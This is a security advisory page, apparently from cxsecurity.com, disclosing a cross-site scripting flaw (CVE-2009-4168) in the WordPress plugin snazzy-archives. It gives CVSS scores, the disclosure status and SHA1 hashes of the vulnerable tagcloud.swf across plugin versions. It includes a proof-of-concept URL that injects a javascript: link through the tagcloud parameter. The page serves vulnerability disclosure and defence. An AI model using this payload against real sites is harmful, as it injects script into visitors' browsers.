WordPress plugin snazzy-archives XSS vulnerability

2013.03.11
Credit: Henri Salo
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2009-4168
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Plugin URL: http://wordpress.org/extend/plugins/snazzy-archives/ Versions affected: 1.7.1 and below Reported to WordPress plugins team: 2013-02-03 Status: Plugin currently disabled by WordPress plugins team. Not fixed by plugin maintainer. PoC: wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert%28%22oss-security%20is%20great!%22%29%27+style=%27font-size:+40pt%27%3Efree%20pr0n%3C/a%3E%3C/tags%3E faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.6.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.4/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.6.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.4.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.4/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.0/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.7.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.6.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.7.0/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.0.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.6/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/trunk/i/tagcloud.swf -- Henri Salo

References:

http://seclists.org/oss-sec/2013/q1/614
http://wordpress.org/extend/plugins/snazzy-archives/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top